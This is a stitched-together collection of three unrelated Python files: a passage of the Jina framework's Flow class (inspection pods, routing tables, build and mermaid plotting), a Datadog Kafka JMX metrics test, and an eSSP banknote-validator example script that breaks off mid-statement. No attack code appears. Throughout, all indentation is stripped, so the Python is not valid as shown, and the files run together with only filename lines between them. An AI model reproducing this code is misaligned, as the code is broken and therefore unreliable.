# grpc data runtime does not support sharding at the moment
if (
args.grpc_data_requests
and kwargs.get('shards') is not None
and kwargs.get('shards', 1) > 1
and self.args.infrastructure != InfrastructureType.K8S
):
raise NotImplementedError("GRPC data runtime does not support sharding")
if args.grpc_data_requests and args.runtime_cls == 'ZEDRuntime':
args.runtime_cls = 'GRPCDataRuntime'
# pod workspace if not set then derive from flow workspace
args.workspace = os.path.abspath(args.workspace or self.workspace)
args.k8s_namespace = self.args.name
op_flow._pod_nodes[pod_name] = PodFactory.build_pod(
args, needs, self.args.infrastructure
)
op_flow.last_pod = pod_name
return op_flow
@allowed_levels([FlowBuildLevel.EMPTY])
def inspect(self, name: str = 'inspect', *args, **kwargs) -> 'Flow':
"""Add an inspection on the last changed Pod in the Flow
Internally, it adds two Pods to the Flow. But don't worry, the overhead is minimized and you
can remove them by simply using `Flow(inspect=FlowInspectType.REMOVE)` before using the Flow.
.. highlight:: bash
.. code-block:: bash
Flow -- PUB-SUB -- BasePod(_pass) -- Flow
|
-- PUB-SUB -- InspectPod (Hanging)
In this way, :class:`InspectPod` looks like a simple ``_pass`` from outside and
does not introduce side-effects (e.g. changing the socket type) to the original Flow.
The original incoming and outgoing socket types are preserved.
This function is very handy for introducing an Evaluator into the Flow.
.. seealso::
:meth:`gather_inspect`
:param name: name of the Pod
:param args: args for .add()
:param kwargs: kwargs for .add()
:return: the new instance of the Flow
"""
_last_pod = self.last_pod
op_flow = self.add(
name=name, needs=_last_pod, pod_role=PodRoleType.INSPECT, *args, **kwargs
)
# now remove uses and add an auxiliary Pod
if 'uses' in kwargs:
kwargs.pop('uses')
op_flow = op_flow.add(
name=f'_aux_{name}',
needs=_last_pod,
pod_role=PodRoleType.INSPECT_AUX_PASS,
*args,
**kwargs,
)
# register any future connection to _last_pod by the auxiliary Pod
op_flow._inspect_pods[_last_pod] = op_flow.last_pod
return op_flow
@allowed_levels([FlowBuildLevel.EMPTY])
def gather_inspect(
self,
name: str = 'gather_inspect',
include_last_pod: bool = True,
*args,
**kwargs,
) -> 'Flow':
"""Gather all inspect Pods output into one Pod. When the Flow has no inspect Pod then the Flow itself
is returned.
.. note::
If ``--no-inspect`` is **not** given, then :meth:`gather_inspect` is auto called before :meth:`build`. So
in general you don't need to manually call :meth:`gather_inspect`.
:param name: the name of the gather Pod
:param include_last_pod: if to include the last modified Pod in the Flow
:param args: args for .add()
:param kwargs: kwargs for .add()
:return: the modified Flow or the copy of it
.. seealso::
:meth:`inspect`
"""
needs = [k for k, v in self._pod_nodes.items() if v.role == PodRoleType.INSPECT]
if needs:
if include_last_pod:
needs.append(self.last_pod)
return self.add(
name=name,
needs=needs,
pod_role=PodRoleType.JOIN_INSPECT,
*args,
**kwargs,
)
else:
# no inspect node is in the graph, return the current graph
return self
def _get_gateway_target(self, prefix):
gateway_pod = self._pod_nodes[GATEWAY_NAME]
return (
f'{prefix}-{GATEWAY_NAME}',
{
'host': gateway_pod.head_host,
'port': gateway_pod.head_port_in,
'expected_parts': 0,
},
)
# TODO needs to be refactored - deployment should not be a dictionary. Related Ticket: https://github.com/jina-ai/jina/issues/3280
def _get_routing_table(self) -> RoutingTable:
graph = RoutingTable()
for pod_id, pod in self._pod_nodes.items():
if pod_id == GATEWAY_NAME:
deployment = pod.deployments[0]
graph.add_pod(
f'start-{GATEWAY_NAME}',
deployment['head_host'],
deployment['head_port_in'],
deployment['tail_port_out'],
deployment['head_zmq_identity'],
)
graph.add_pod(
f'end-{GATEWAY_NAME}',
deployment['head_host'],
deployment['head_port_in'],
deployment['tail_port_out'],
deployment['head_zmq_identity'],
)
else:
for deployment in pod.deployments:
graph.add_pod(
deployment['name'],
deployment['head_host'],
deployment['head_port_in'],
deployment['tail_port_out'],
deployment['head_zmq_identity'],
)
for end, pod in self._pod_nodes.items():
if end == GATEWAY_NAME:
end = f'end-{GATEWAY_NAME}'
if pod.head_args.hosts_in_connect is None:
pod.head_args.hosts_in_connect = []
if end not in graph.pods:
end = end + '_head'
for start in pod.needs:
if start == GATEWAY_NAME:
start = f'start-{GATEWAY_NAME}'
if start not in graph.pods:
start = start + '_tail'
start_pod = graph._get_target_pod(start)
if pod.connect_to_predecessor or is_remote_local_connection(
start_pod.host, pod.head_host
):
pod.head_args.hosts_in_connect.append(
graph._get_target_pod(start).full_out_address
)
graph.add_edge(start, end, True)
else:
graph.add_edge(start, end)
# In case of sharding, the head and the tail pea have to be connected to the shards
for end, pod in self._pod_nodes.items():
if len(pod.deployments) > 0:
deployments = pod.deployments
for deployment in deployments[1:-1]:
graph.add_edge(deployments[0]['name'], deployment['name'])
graph.add_edge(deployment['name'], deployments[-1]['name'])
graph.active_pod = f'start-{GATEWAY_NAME}'
return graph
def _set_initial_dynamic_routing_table(self):
routing_table = self._get_routing_table()
if not routing_table.is_acyclic():
raise RoutingTableCyclicError(
'The routing graph has a cycle. This would result in an infinite loop. Fix your Flow setup.'
)
for pod in self._pod_nodes:
routing_table_copy = RoutingTable()
routing_table_copy.proto.CopyFrom(routing_table.proto)
self._pod_nodes[
pod
].args.static_routing_table = self.args.static_routing_table
# The gateway always needs the routing table to be set
if pod == GATEWAY_NAME:
self._pod_nodes[pod].args.routing_table = routing_table_copy.json()
# For other pods we only set it if we are told do so
elif self.args.static_routing_table:
routing_table_copy.active_pod = pod
self._pod_nodes[pod].args.routing_table = routing_table_copy.json()
self._pod_nodes[pod].update_pea_args()
@allowed_levels([FlowBuildLevel.EMPTY])
def build(self, copy_flow: bool = False) -> 'Flow':
"""
Build the current Flow and make it ready to use
.. note::
No need to manually call it since 0.0.8. When using Flow with the
context manager, or using :meth:`start`, :meth:`build` will be invoked.
:param copy_flow: when set to true, then always copy the current Flow and do the modification on top of it then return, otherwise, do in-line modification
:return: the current Flow (by default)
.. note::
``copy_flow=True`` is recommended if you are building the same Flow multiple times in a row. e.g.
.. highlight:: python
.. code-block:: python
f = Flow()
with f:
f.index()
with f.build(copy_flow=True) as fl:
fl.search()
.. # noqa: DAR401
"""
op_flow = copy.deepcopy(self) if copy_flow else self
if op_flow.args.inspect == FlowInspectType.COLLECT:
op_flow.gather_inspect(copy_flow=False)
if GATEWAY_NAME not in op_flow._pod_nodes:
op_flow._add_gateway(needs={op_flow.last_pod})
# if set no_inspect then all inspect related nodes are removed
if op_flow.args.inspect == FlowInspectType.REMOVE:
op_flow._pod_nodes = {
k: v for k, v in op_flow._pod_nodes.items() if not v.role.is_inspect
}
reverse_inspect_map = {v: k for k, v in op_flow._inspect_pods.items()}
for end, pod in op_flow._pod_nodes.items():
# if an endpoint is being inspected, then replace it with inspected Pod
# but not those inspect related node
if op_flow.args.inspect.is_keep:
pod.needs = set(
ep if pod.role.is_inspect else op_flow._inspect_pods.get(ep, ep)
for ep in pod.needs
)
else:
pod.needs = set(reverse_inspect_map.get(ep, ep) for ep in pod.needs)
op_flow._set_initial_dynamic_routing_table()
hanging_pods = _hanging_pods(op_flow)
if hanging_pods:
op_flow.logger.warning(
f'{hanging_pods} are hanging in this flow with no pod receiving from them, '
f'you may want to double check if it is intentional or some mistake'
)
op_flow._build_level = FlowBuildLevel.GRAPH
return op_flow
def __call__(self, *args, **kwargs):
"""Builds the Flow
:param args: args for build
:param kwargs: kwargs for build
:return: the built Flow
"""
return self.build(*args, **kwargs)
def __enter__(self):
with CatchAllCleanupContextManager(self):
return self.start()
def __exit__(self, exc_type, exc_val, exc_tb):
super().__exit__(exc_type, exc_val, exc_tb)
# unset all envs to avoid any side-effect
if self.args.env:
for k in self.args.env.keys():
os.unsetenv(k)
if GATEWAY_NAME in self._pod_nodes:
self._pod_nodes.pop(GATEWAY_NAME)
self._build_level = FlowBuildLevel.EMPTY
self.logger.debug('Flow is closed!')
self.logger.close()
def start(self):
"""Start to run all Pods in this Flow.
Remember to close the Flow with :meth:`close`.
Note that this method has a timeout of ``timeout_ready`` set in CLI,
which is inherited all the way from :class:`jina.peapods.peas.BasePea`
.. # noqa: DAR401
:return: this instance
"""
if self._build_level.value < FlowBuildLevel.GRAPH.value:
self.build(copy_flow=False)
# set env only before the Pod get started
if self.args.env:
for k, v in self.args.env.items():
os.environ[k] = str(v)
for k, v in self:
v.args.noblock_on_start = True
if not getattr(v.args, 'external', False):
self.enter_context(v)
self._wait_until_all_ready()
self._build_level = FlowBuildLevel.RUNNING
return self
def _wait_until_all_ready(self) -> bool:
results = {}
threads = []
def _wait_ready(_pod_name, _pod):
try:
if not getattr(_pod.args, 'external', False):
results[_pod_name] = 'pending'
_pod.wait_start_success()
results[_pod_name] = 'done'
except Exception as ex:
results[_pod_name] = repr(ex)
def _polling_status():
spinner = itertools.cycle(
['⠋', '⠙', '⠹', '⠸', '⠼', '⠴', '⠦', '⠧', '⠇', '⠏']
)
while True:
num_all = len(results)
num_done = 0
pendings = []
for _k, _v in results.items():
sys.stdout.flush()
if _v == 'pending':
pendings.append(_k)
else:
num_done += 1
sys.stdout.write('\r{}\r'.format(' ' * 100))
pending_str = colored(' '.join(pendings)[:50], 'yellow')
sys.stdout.write(
f'{colored(next(spinner), "green")} {num_done}/{num_all} waiting {pending_str} to be ready...'
)
sys.stdout.flush()
if not pendings:
sys.stdout.write('\r{}\r'.format(' ' * 100))
break
time.sleep(0.1)
# kick off all pods wait-ready threads
for k, v in self:
t = threading.Thread(
target=_wait_ready,
args=(
k,
v,
),
)
threads.append(t)
t.start()
# kick off spinner thread
t_m = threading.Thread(target=_polling_status)
t_m.start()
# kick off ip getter thread
addr_table = []
t_ip = threading.Thread(target=self._get_address_table, args=(addr_table,))
t_ip.start()
for t in threads:
t.join()
t_ip.join()
t_m.join()
error_pods = [k for k, v in results.items() if v != 'done']
if error_pods:
self.logger.error(
f'Flow is aborted due to {error_pods} can not be started.'
)
self.close()
raise RuntimeFailToStart
else:
if self.args.infrastructure == InfrastructureType.K8S:
self.logger.info('🎉 Kubernetes Flow is ready to use!')
else:
self.logger.info('🎉 Flow is ready to use!')
if addr_table:
self.logger.info('\n' + '\n'.join(addr_table))
self.logger.debug(
f'{self.num_pods} Pods (i.e. {self.num_peas} Peas) are running in this Flow'
)
@property
def num_pods(self) -> int:
"""Get the number of Pods in this Flow
.. # noqa: DAR201"""
return len(self._pod_nodes)
@property
def num_peas(self) -> int:
"""Get the number of peas (parallel count) in this Flow
.. # noqa: DAR201"""
return sum(v.num_peas for v in self._pod_nodes.values())
def __eq__(self, other: 'Flow') -> bool:
"""
Compare the topology of a Flow with another Flow.
Identification is defined by whether two flows share the same set of edges.
:param other: the second Flow object
:return: result of equality check
"""
if self._build_level.value < FlowBuildLevel.GRAPH.value:
op_flow = copy.deepcopy(self)
a = op_flow.build()
else:
a = self
if other._build_level.value < FlowBuildLevel.GRAPH.value:
op_flow_b = copy.deepcopy(other)
b = op_flow_b.build()
else:
b = other
return a._pod_nodes == b._pod_nodes
@property
def client(self) -> 'BaseClient':
"""Return a :class:`BaseClient` object attach to this Flow.
.. # noqa: DAR201"""
kwargs = dict(
host=self.host,
port=self.port_expose,
protocol=self.protocol,
)
kwargs.update(self._common_kwargs)
return Client(**kwargs)
@property
def _mermaid_str(self):
mermaid_graph = [
"%%{init: {'theme': 'base', "
"'themeVariables': { 'primaryColor': '#32C8CD', "
"'edgeLabelBackground':'#fff', 'clusterBkg': '#FFCC66'}}}%%",
'graph LR',
]
start_repl = {}
end_repl = {}
for node, v in self._pod_nodes.items():
if not v.is_singleton and v.role != PodRoleType.GATEWAY:
if v.args.replicas == 1:
mermaid_graph.append(
f'subgraph sub_{node} ["{node} ({v.args.parallel})"]'
)
else:
mermaid_graph.append(
f'subgraph sub_{node} ["{node} ({v.args.replicas})({v.args.parallel})"]'
)
if v.is_head_router:
head_router = node + '_HEAD'
end_repl[node] = (head_router, '((fa:fa-random))')
if v.is_tail_router:
tail_router = node + '_TAIL'
start_repl[node] = (tail_router, '((fa:fa-random))')
for i in range(v.args.replicas):
if v.is_head_router:
head_replica_router = node + f'_{i}_HEAD'
if v.args.replicas == 1:
end_repl[node] = (head_replica_router, '((fa:fa-random))')
if v.is_tail_router:
tail_replica_router = node + f'_{i}_TAIL'
if v.args.replicas == 1:
start_repl[node] = (tail_replica_router, '((fa:fa-random))')
p_r = '((%s))'
p_e = '[[%s]]'
if v.args.replicas > 1:
mermaid_graph.append(
f'\t{head_router}{p_r % "head"}:::pea-->{head_replica_router}{p_e % "replica_head"}:::pea'
)
mermaid_graph.append(
f'\t{tail_replica_router}{p_r % "replica_tail"}:::pea-->{tail_router}{p_e % "tail"}:::pea'
)
for j in range(v.args.parallel):
r = v.args.uses
if v.args.replicas > 1:
r += f'_{i}_{j}'
elif v.args.parallel > 1:
r += f'_{j}'
if v.is_head_router:
mermaid_graph.append(
f'\t{head_replica_router}{p_r % "head"}:::pea-->{r}{p_e % r}:::pea'
)
if v.is_tail_router:
mermaid_graph.append(
f'\t{r}{p_e % r}:::pea-->{tail_replica_router}{p_r % "tail"}:::pea'
)
mermaid_graph.append('end')
for node, v in self._pod_nodes.items():
for need in sorted(v.needs):
_s = start_repl.get(
need, (need, f'("{need}<br>({self._pod_nodes[need].args.uses})")')
)
_e = end_repl.get(node, (node, f'("{node}<br>({v.args.uses})")'))
_s_role = self._pod_nodes[need].role
_e_role = self._pod_nodes[node].role
line_st = '-->'
if _s_role in {PodRoleType.INSPECT, PodRoleType.JOIN_INSPECT}:
_s = start_repl.get(need, (need, f'{{{{{need}}}}}'))
elif _s_role == PodRoleType.GATEWAY:
_s = start_repl.get(need, (need, f'("{need}")'))
if _e_role == PodRoleType.GATEWAY:
_e = ('gateway_END', f'({node})')
elif _e_role in {PodRoleType.INSPECT, PodRoleType.JOIN_INSPECT}:
_e = end_repl.get(node, (node, f'{{{{{node}}}}}'))
if _s_role == PodRoleType.INSPECT or _e_role == PodRoleType.INSPECT:
line_st = '-.->'
mermaid_graph.append(
f'{_s[0]}{_s[1]}:::{str(_s_role)} {line_st} {_e[0]}{_e[1]}:::{str(_e_role)}'
)
mermaid_graph.append(
f'classDef {str(PodRoleType.POD)} fill:#32C8CD,stroke:#009999'
)
mermaid_graph.append(
f'classDef {str(PodRoleType.INSPECT)} fill:#ff6666,color:#fff'
)
mermaid_graph.append(
f'classDef {str(PodRoleType.JOIN_INSPECT)} fill:#ff6666,color:#fff'
)
mermaid_graph.append(
f'classDef {str(PodRoleType.GATEWAY)} fill:#6E7278,color:#fff'
)
mermaid_graph.append(
f'classDef {str(PodRoleType.INSPECT_AUX_PASS)} fill:#fff,color:#000,stroke-dasharray: 5 5'
)
mermaid_graph.append('classDef pea fill:#009999,stroke:#1E6E73')
return '\n'.join(mermaid_graph)
def plot(
self,
output: Optional[str] = None,
vertical_layout: bool = False,
inline_display: bool = False,
build: bool = True,
copy_flow: bool = True,
) -> 'Flow':
"""
Visualize the Flow up to the current point
If a file name is provided it will create a jpg image with that name,
otherwise it will display the URL for mermaid.
If called within IPython notebook, it will be rendered inline,
otherwise an image will be created.
Example,
.. highlight:: python
.. code-block:: python
flow = Flow().add(name='pod_a').plot('flow.svg')
:param output: a filename specifying the name of the image to be created,
the suffix svg/jpg determines the file type of the output image
:param vertical_layout: top-down or left-right layout
:param inline_display: show image directly inside the Jupyter Notebook
:param build: build the Flow first before plotting, gateway connection can be better showed
:param copy_flow: when set to true, then always copy the current Flow and
do the modification on top of it then return, otherwise, do in-line modification
:return: the Flow
"""
# deepcopy causes the below error while reusing a Flow in Jupyter
# 'Pickling an AuthenticationString object is disallowed for security reasons'
op_flow = copy.deepcopy(self) if copy_flow else self
if build:
op_flow.build(False)
mermaid_str = op_flow._mermaid_str
if vertical_layout:
mermaid_str = mermaid_str.replace('graph LR', 'graph TD')
image_type = 'svg'
if output and not output.endswith('svg'):
image_type = 'img'
url = op_flow._mermaid_to_url(mermaid_str, image_type)
showed = False
if inline_display:
try:
from IPython.display import display, Image
display(Image(url=url))
showed = True
except:
# no need to panic users
pass
if output:
download_mermaid_url(url, output)
elif not showed:
op_flow.logger.info(f'flow visualization: {url}')
return self
def _ipython_display_(self):
"""Displays the object in IPython as a side effect"""
self.plot(
inline_display=True, build=(self._build_level != FlowBuildLevel.GRAPH)
)
def _mermaid_to_url(self, mermaid_str: str, img_type: str) -> str:
"""
Render the current Flow as URL points to a SVG. It needs internet connection
:param mermaid_str: the mermaid representation
:param img_type: image type (svg/jpg)
:return: the url points to a SVG
"""
encoded_str = base64.b64encode(bytes(mermaid_str, 'utf-8')).decode('utf-8')
return f'https://mermaid.ink/{img_type}/{encoded_str}'
@property
def port_expose(self) -> int:
"""Return the exposed port of the gateway
.. # noqa: DAR201
"""
if GATEWAY_NAME in self._pod_nodes:
return self._pod_nodes[GATEWAY_NAME].args.port_expose
else:
return self._common_kwargs.get('port_expose', None)
@port_expose.setter
def port_expose(self, value: int):
"""Set the new exposed port of the Flow (affects Gateway and Client)
:param value: the new port to expose
"""
self._common_kwargs['port_expose'] = value
# Flow is build to graph already
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.port_expose = self._common_kwargs['port_expose']
# Flow is running already, then close the existing gateway
if self._build_level >= FlowBuildLevel.RUNNING:
self[GATEWAY_NAME].close()
self.enter_context(self[GATEWAY_NAME])
self[GATEWAY_NAME].wait_start_success()
@property
def host(self) -> str:
"""Return the local address of the gateway
.. # noqa: DAR201
"""
if GATEWAY_NAME in self._pod_nodes:
return self._pod_nodes[GATEWAY_NAME].host
else:
return self._common_kwargs.get('host', __default_host__)
@host.setter
def host(self, value: str):
"""Set the new host of the Flow (affects Gateway and Client)
:param value: the new port to expose
"""
self._common_kwargs['host'] = value
# Flow is build to graph already
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.host = self._common_kwargs['host']
# Flow is running already, then close the existing gateway
if self._build_level >= FlowBuildLevel.RUNNING:
self[GATEWAY_NAME].close()
self.enter_context(self[GATEWAY_NAME])
self[GATEWAY_NAME].wait_start_success()
@property
def address_private(self) -> str:
"""Return the private IP address of the gateway for connecting from other machine in the same network
.. # noqa: DAR201"""
return get_internal_ip()
@property
def address_public(self) -> str:
"""Return the public IP address of the gateway for connecting from other machine in the public network
.. # noqa: DAR201"""
return get_public_ip()
def __iter__(self):
return self._pod_nodes.items().__iter__()
def _get_address_table(self, address_table):
address_table.extend(
[
f'\t🔗 Protocol: \t\t{colored(self.protocol, attrs="bold")}',
f'\t🏠 Local access:\t'
+ colored(f'{self.host}:{self.port_expose}', 'cyan', attrs='underline'),
f'\t🔒 Private network:\t'
+ colored(
f'{self.address_private}:{self.port_expose}',
'cyan',
attrs='underline',
),
]
)
if self.address_public:
address_table.append(
f'\t🌐 Public address:\t'
+ colored(
f'{self.address_public}:{self.port_expose}',
'cyan',
attrs='underline',
)
)
if self.protocol == GatewayProtocolType.HTTP:
address_table.append(
f'\t💬 Swagger UI:\t\t'
+ colored(
f'http://localhost:{self.port_expose}/docs',
'cyan',
attrs='underline',
)
)
address_table.append(
f'\t📚 Redoc:\t\t'
+ colored(
f'http://localhost:{self.port_expose}/redoc',
'cyan',
attrs='underline',
)
)
return address_table
def block(self):
"""Block the process until user hits KeyboardInterrupt"""
try:
threading.Event().wait()
except KeyboardInterrupt:
pass
@property
def protocol(self) -> GatewayProtocolType:
"""Return the protocol of this Flow
:return: the protocol of this Flow
"""
v = self._common_kwargs.get('protocol', GatewayProtocolType.GRPC)
if isinstance(v, str):
v = GatewayProtocolType.from_string(v)
return v
@protocol.setter
def protocol(self, value: Union[str, GatewayProtocolType]):
"""Set the protocol of this Flow
:param value: the protocol to set
"""
if isinstance(value, str):
self._common_kwargs['protocol'] = GatewayProtocolType.from_string(value)
elif isinstance(value, GatewayProtocolType):
self._common_kwargs['protocol'] = value
else:
raise TypeError(f'{value} must be either `str` or `GatewayProtocolType`')
# Flow is build to graph already
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.protocol = self._common_kwargs['protocol']
# Flow is running already, then close the existing gateway
if self._build_level >= FlowBuildLevel.RUNNING:
self[GATEWAY_NAME].close()
self.enter_context(self[GATEWAY_NAME])
self[GATEWAY_NAME].wait_start_success()
def __getitem__(self, item):
if isinstance(item, str):
return self._pod_nodes[item]
elif isinstance(item, int):
return list(self._pod_nodes.values())[item]
else:
raise TypeError(f'{typename(item)} is not supported')
@property
def workspace(self) -> str:
"""Return the workspace path of the flow.
.. # noqa: DAR201"""
return os.path.abspath(self.args.workspace or './')
@property
def workspace_id(self) -> Dict[str, str]:
"""Get all Pods' ``workspace_id`` values in a dict
.. # noqa: DAR201"""
return {
k: p.args.workspace_id for k, p in self if hasattr(p.args, 'workspace_id')
}
@workspace_id.setter
def workspace_id(self, value: str):
"""Set all Pods' ``workspace_id`` to ``value``
:param value: a hexadecimal UUID string
"""
uuid.UUID(value)
for k, p in self:
if hasattr(p.args, 'workspace_id'):
p.args.workspace_id = value
args = getattr(p, 'peas_args', getattr(p, 'replicas_args', None))
if args is None:
raise ValueError(
f'could not find "peas_args" or "replicas_args" on {p}'
)
values = None
if isinstance(args, dict):
values = args.values()
elif isinstance(args, list):
values = args
for v in values:
if v and isinstance(v, argparse.Namespace):
v.workspace_id = value
if v and isinstance(v, List):
for i in v:
i.workspace_id = value
@property
def identity(self) -> Dict[str, str]:
"""Get all Pods' ``identity`` values in a dict
.. # noqa: DAR201
"""
return {k: p.args.identity for k, p in self}
@identity.setter
def identity(self, value: str):
"""Set all Pods' ``identity`` to ``value``
:param value: a hexadecimal UUID string
"""
uuid.UUID(value)
# Re-initiating logger with new identity
self.logger = JinaLogger(self.__class__.__name__, **vars(self.args))
for _, p in self:
p.args.identity = value
@overload
def expose_endpoint(self, exec_endpoint: str, path: Optional[str] = None):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
:param exec_endpoint: the endpoint string, by convention starts with `/`
:param path: the HTTP endpoint string, when not given, it is `exec_endpoint`
"""
...
@overload
def expose_endpoint(
self,
exec_endpoint: str,
*,
path: Optional[str] = None,
status_code: int = 200,
tags: Optional[List[str]] = None,
summary: Optional[str] = None,
description: Optional[str] = None,
response_description: str = 'Successful Response',
deprecated: Optional[bool] = None,
methods: Optional[List[str]] = None,
operation_id: Optional[str] = None,
response_model_by_alias: bool = True,
response_model_exclude_unset: bool = False,
response_model_exclude_defaults: bool = False,
response_model_exclude_none: bool = False,
include_in_schema: bool = True,
name: Optional[str] = None,
):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
Use this method to specify your HTTP endpoint with richer semantic and schema.
:param exec_endpoint: the endpoint string, by convention starts with `/`
# noqa: DAR101
"""
...
def expose_endpoint(self, exec_endpoint: str, **kwargs):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
:param exec_endpoint: the endpoint string, by convention starts with `/`
# noqa: DAR101
# noqa: DAR102
"""
self._endpoints_mapping[exec_endpoint] = kwargs
# for backward support
join = needs
def rolling_update(self, pod_name: str, dump_path: Optional[str] = None):
"""
Reload Pods sequentially - only used for compound pods.
:param dump_path: the path from which to read the dump data
:param pod_name: pod to update
"""
# TODO: By design after the Flow object started, Flow shouldn't have memory access to its sub-objects anymore.
# All controlling should be issued via Network Request, not via memory access.
# In the current master, we have Flow.rolling_update() & Flow.dump() method avoid the above design.
# Avoiding this design make the whole system NOT cloud-native.
warnings.warn(
'This function is experimental and facing potential refactoring',
FutureWarning,
)
compound_pod = self._pod_nodes[pod_name]
if isinstance(compound_pod, CompoundPod):
compound_pod.rolling_update(dump_path)
else:
raise ValueError(
f'The BasePod {pod_name} is not a CompoundPod and does not support updating'
)
@property
def client_args(self) -> argparse.Namespace:
"""Get Client settings.
# noqa: DAR201
"""
if 'port_expose' in self._common_kwargs:
kwargs = copy.deepcopy(self._common_kwargs)
kwargs['port'] = self._common_kwargs['port_expose']
return ArgNamespace.kwargs2namespace(kwargs, set_client_cli_parser())
@property
def gateway_args(self) -> argparse.Namespace:
"""Get Gateway settings.
# noqa: DAR201
"""
return ArgNamespace.kwargs2namespace(self._common_kwargs, set_gateway_parser())
def update_network_interface(self, **kwargs):
"""Update the network interface of this Flow (affects Gateway & Client)
:param kwargs: new network settings
"""
self._common_kwargs.update(kwargs)
|
test_kafka.py
|
# (C) Datadog, Inc. 2010-2016
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
# stdlib
import threading
import time
from types import ListType
import unittest
import os
import mock
# 3p
from nose.plugins.attrib import attr
# project
from aggregator import MetricsAggregator
import logging
log = logging.getLogger('kafka_test')
STATSD_PORT = 8121
LOG_INFO = {
'log_level': None,
'log_to_event_viewer': False,
'log_to_syslog': False,
'syslog_host': None,
'syslog_port': None,
'log_level': logging.INFO,
'disable_file_logging': True,
'collector_log_file': '/tmp/collector.log',
'forwarder_log_file': '/tmp/forwarder.log',
'dogstatsd_log_file': '/tmp/dogstatsd.log',
'jmxfetch_log_file': '/tmp/datadog/jmxfetch.log',
'go-metro_log_file': '/tmp/datadog/go-metro.log',
}
with mock.patch('config.get_logging_config', return_value=LOG_INFO):
from jmxfetch import JMXFetch
from stsstatsd import Server
class DummyReporter(threading.Thread):
def __init__(self, metrics_aggregator):
threading.Thread.__init__(self)
self.finished = threading.Event()
self.metrics_aggregator = metrics_aggregator
self.interval = 10
self.metrics = None
self.finished = False
self.start()
def run(self):
while not self.finished:
time.sleep(self.interval)
self.flush()
def flush(self):
metrics = self.metrics_aggregator.flush()
if metrics:
self.metrics = metrics
@attr(requires='kafka')
class TestKafka(unittest.TestCase):
"""Basic Test for kafka integration."""
def setUp(self):
aggregator = MetricsAggregator("test_host")
self.server = Server(aggregator, "localhost", STATSD_PORT)
self.reporter = DummyReporter(aggregator)
self.t1 = threading.Thread(target=self.server.start)
self.t1.start()
confd_path = os.path.join(os.path.dirname(__file__), 'ci/resources/')
self.jmx_daemon = JMXFetch(confd_path, {'dogstatsd_port': STATSD_PORT})
self.t2 = threading.Thread(target=self.jmx_daemon.run)
self.t2.start()
def tearDown(self):
self.server.stop()
self.reporter.finished = True
self.jmx_daemon.terminate()
def testCustomJMXMetric(self):
count = 0
while self.reporter.metrics is None:
time.sleep(1)
count += 1
if count > 25:
raise Exception("No metrics were received in 25 seconds")
metrics = self.reporter.metrics
# expected_tags = ['env:test', 'instance:kafka-172.17.0.1-9999', 'kafka:broker']
self.assertTrue(isinstance(metrics, ListType))
self.assertTrue(len(metrics) > 0)
log.info(metrics)
log.info(len(metrics))
self.assertTrue(
len([t for t in metrics if "jvm." in t['metric'] and "instance:kafka-172.17.0.1-9999" in t['tags']]) >= 13, metrics)
self.assertTrue(
len([t for t in metrics if "kafka.request." in t['metric'] and "instance:kafka-172.17.0.1-9999" in t['tags']]) == 12, metrics)
self.assertTrue(
len([t for t in metrics if "kafka.replication." in t['metric'] and "instance:kafka-172.17.0.1-9999" in t['tags']]) == 6, metrics)
# CLIENT metrics.
# kafka.producer.request_latency_avg
self.assertTrue(
len([t for t in metrics if "kafka.producer." in t['metric'] and "instance:kafka-172.17.0.1-7777" in t['tags']]) == 1, metrics)
# kafka.consumer.fetch_rate, kafka.consumer.max_lag
self.assertTrue(
len([t for t in metrics if "kafka.consumer." in t['metric'] and "instance:kafka-172.17.0.1-7777" in t['tags']]) == 2, metrics)
# self.assertTrue(
# len([t for t in metrics if "kafka.follower." in t['metric'] and "instance:kafka-172.17.0.1-9999" in t['tags']]) > 40, metrics)
# self.assertTrue(
# len([t for t in metrics if "kafka.net." in t['metric'] and "instance:kafka-172.17.0.1-9999" in t['tags']]) > 40, metrics)
# self.assertTrue(
# len([t for t in metrics if "kafka.messages_in" in t['metric'] and "instance:kafka-172.17.0.1-9999" in t['tags']]) > 40, metrics)
|
ex1.py
|
import threading
from eSSP.constants import Status
from eSSP import eSSP # Import the library
from time import sleep
# Create a new object ( Validator Object ) and initialize it ( In debug mode, so it will print debug infos )
validator = eSSP(com_port="/dev/ttyUSB0", ssp_address="0", nv11=False, debug=True)
def event_loop():
while True:
# ---- Example of interaction with events ---- #
if validator.nv11: # If the model is an NV11, put every 100 note in the storage, and others in the stack(cashbox), but that's just for this example
(note, currency,event) = validator.get_last_event()
if note == 0 or currency == 0 or event == 0:
pass # Operation that do not send money info, we don't do anything with it
else:
if note != 4 and event == Status.SSP_POLL_CREDIT:
validator.print_debug("NOT A 100 NOTE")
validator.nv11_stack_next_note()
validator.enable_validator()
elif note == 4 and event == Status.SSP_POLL_READ:
validator.print_debug("100 NOTE")
validator.set_route_storage(100) # Route to storage
validator.do_actions()
validator.set_route_cashbox(50) # Everything under or equal to 50 to cashbox ( NV11 )
sleep(0.5)
t1 = threading.Thread(target=event_loop) # Create a new thread on the Validator System Loop ( needed for the signal )
t1.setDaemon(True) # Set the thread as daemon because it don't catch the KeyboardInterrupt, so it will stop when we cut the main thread
t1.start() # Start the validator system loop thread ( Needed for starting sending action )
try: # Command Interpreter
while True:
choice = input("")
if choice == "p": # Payout "choice" value bill ( 10, 20, 50, 100, etc. )
choice = input("")
validator.payout(int(choice))
elif choice == "s": # Route to cashbox ( In NV11, it is any amount <= than "choice" )
choice = input("")
validator.set_route_storage(int(choice))
elif choice == "c": # Route to cashbox ( In NV11, it is any amount <= than "choice" )
choice = input("")
validator.set_route_cashbox(int(choice))
elif choice == "e": # Enable ( Automaticaly disabled after a payout )
validator.enable_validator()
elif choice == "r": # Reset ( It's like a "reboot" of the validator )
validator.reset()
elif choice == "y": # NV11 Payout last entered ( next available )
print("Payout next 1")
validator.nv11_payout_next_note()
elif choice == "d": # Disable
validator.disable_validator()
elif choice == "D": # Disable the payout device
